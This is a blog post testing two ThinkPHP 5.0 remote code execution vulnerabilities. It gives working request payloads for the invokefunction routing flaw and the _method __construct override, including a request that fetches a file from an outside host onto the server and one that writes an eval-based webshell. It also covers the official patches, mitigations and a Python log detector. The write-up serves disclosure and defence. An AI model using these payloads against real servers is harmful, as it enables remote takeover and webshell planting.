ThinkPHP5.0 vulnerability testing

Since ThinkPHP released its bug fixes, my server has been hit by countless batch-scanning requests probing this vulnerability to grab hosts as bots.
Although the official patch is already out, I still wanted to try the TP vulnerabilities myself, so here are two vulnerability tests.

One, full-version code execution vulnerability

<!-- GET -->
http://127.0.0.1/ThinkPHP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Because the controller name is not properly checked, when forced routing is not enabled you can call phpinfo() directly; if the server does not restrict command-execution functions such as system, you can execute shell commands directly and escalate privileges.
For the detailed execution process of this vulnerability, see the vulnerability execution analyses in the reference articles at the end.

Official patch

Add a regular expression to restrict the controller name:

/* thinkphp/library/think/App.php, added at line 555 */
if (!preg_match('/^[A-Za-z](\w)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

Two, _method vulnerability

<!-- POST -->
http://127.0.0.1/ThinkPHP/index.php?s=captcha
<!-- Headers -->
Content-Type:application/x-www-form-urlencoded
<!-- Body -->
_method=__construct&filter[]=system&method=GET&get[]=dir

Triggering conditions

//Config.php
'var_method'             => '_method'

The real request method is passed through $_POST['_method']. When $_POST['_method'] is set to __construct, the method() function of the Request class ends up calling the constructor with the POST data, so the class's variables are overwritten by the POST data. Using this to overwrite the filter variable with a function name such as system, any command is executed when the parameters are filtered internally.
Based on this, a PHP file test.php can be uploaded directly:

<!-- POST -->
http://127.0.0.1/ThinkPHP/index.php?s=captcha&fileDown=copy("http://xxx/1.txt","test.php")
<!-- Headers -->
Content-Type:application/x-www-form-urlencoded
<!-- Body -->
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=fileDown

Generating a one-line Trojan (webshell)

<!-- POST -->
http://127.0.0.1/ThinkPHP/index.php?s=captcha&T=echo+^<?php+phpinfo();eval($_POST[cmd]);?^>+>>info.php
<!-- Headers -->
Content-Type:application/x-www-form-urlencoded
<!-- Body -->
_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=123

As a mitigation, the _method variable name can be set to a different string in config.php, or TP can be upgraded.

Official patch

The official patch restricts _method to a whitelist of request methods and unsets _method after processing it, so the class variables can no longer be overwritten via __construct.

/* thinkphp/library/think/Request.php */
public function method($method = false)
{
    if (true === $method) {
        // get the original request method
        return IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
    } elseif (!$this->method) {
        if (isset($_POST[Config::get('var_method')])) {
            $method = strtoupper($_POST[Config::get('var_method')]);
            if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
                $this->method = $method;
                $this->{$this->method}($_POST);
            } else {
                $this->method = 'POST';
            }
            unset($_POST[Config::get('var_method')]); // unset the override after processing
        } elseif (isset($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'])) {
            $this->method = strtoupper($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE']);
        } else {
            $this->method = IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
        }
    }
    return $this->method;
}
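
As an added example (not from the original post or the ThinkPHP project), here is a small Python checker that turns the two official patch rules above into a detection for the scanning traffic mentioned at the start: it flags requests whose s= controller segment fails the ^[A-Za-z]\w*$ rule or carries invokefunction-style parameters, and form bodies whose _method is outside the patch whitelist or that push filter/server properties into the Request object. The log records are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Mirrors the controller rule the App.php patch adds (ASCII \w, like PHP without /u).
CONTROLLER_OK = re.compile(r'[A-Za-z]\w*', re.ASCII)
# Mirrors the _method whitelist from the Request.php patch.
SAFE_METHODS = {'GET', 'POST', 'DELETE', 'PUT', 'PATCH'}


def check_request(uri, body=''):
    """Return the list of findings for one request (URI with query string, form body)."""
    findings = []
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    # 1. Route-based RCE: s=module/controller/action where the controller segment
    #    is not a plain class name (e.g. contains a backslash namespace separator).
    for route in query.get('s', []):
        segs = route.split('/')
        if len(segs) >= 2 and not CONTROLLER_OK.fullmatch(segs[1]):
            findings.append('controller fails name rule: ' + segs[1])
    if 'function' in query or any(k.startswith('vars[') for k in query):
        findings.append('invokefunction-style parameters in query')
    # 2. _method override abuse: a value outside the whitelist (e.g. __construct)
    #    plus Request properties (filter, server) pushed in through the form body.
    form = parse_qs(body, keep_blank_values=True)
    for m in form.get('_method', []):
        if m.upper() not in SAFE_METHODS:
            findings.append('_method override outside whitelist: ' + m)
    for prop in ('filter', 'server'):
        if any(k == prop or k.startswith(prop + '[') for k in form):
            findings.append('Request property injected via form body: ' + prop)
    return findings


def scan_records(records):
    """records: iterable of (client_ip, uri, body); returns {ip: findings} for hits only."""
    hits = {}
    for ip, uri, body in records:
        found = check_request(uri, body)
        if found:
            hits.setdefault(ip, []).extend(found)
    return hits


# Constructed sample traffic: two probes shaped like the payloads above, two benign requests.
SAMPLE_RECORDS = [
    ('203.0.113.5', '/index.php?s=index/think\\app/invokefunction&function=call_user_func_array'
                    '&vars[0]=phpinfo&vars[1][]=1', ''),
    ('203.0.113.9', '/index.php?s=captcha', '_method=__construct&filter[]=system&method=GET&get[]=dir'),
    ('198.51.100.2', '/index.php?s=index/index/index', ''),
    ('198.51.100.3', '/index.php?s=user/profile/save', '_method=PUT&name=alice'),
]

if __name__ == '__main__':
    for ip, findings in scan_records(SAMPLE_RECORDS).items():
        print(ip, '->', '; '.join(findings))
```

Access logs normally carry only the query string, so the body check needs a WAF or application-level request log that records POST fields.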

Reference article:
https://www.cnblogs.com/st404/p/10245844.html
https://mrxn.net/Infiltration/618.html
https://www.cnblogs.com/nul1/p/11863574.html
https://www.vulnbug.com/amp/thkphp5x-code-execution-vulnerabilities-and-bypass.html
https://www.freebuf.com/vuls/194127.html

Origin www.cnblogs.com/WindrunnerMax/p/12558256.html